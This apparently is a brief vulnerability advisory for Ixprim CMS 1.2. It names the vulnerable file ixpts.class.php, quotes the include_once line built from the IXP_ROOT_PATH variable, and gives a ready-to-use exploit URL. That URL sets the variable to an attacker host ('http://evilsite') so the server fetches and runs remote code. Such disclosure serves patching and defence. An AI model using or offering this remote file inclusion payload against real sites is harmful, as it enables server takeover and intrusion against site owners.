Aplication : Ixprim CMS 1.2 URL :http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip variable ixpts.class.php include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' ); Exploit : http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite vitux #vitux.manis@xxxxxxxxx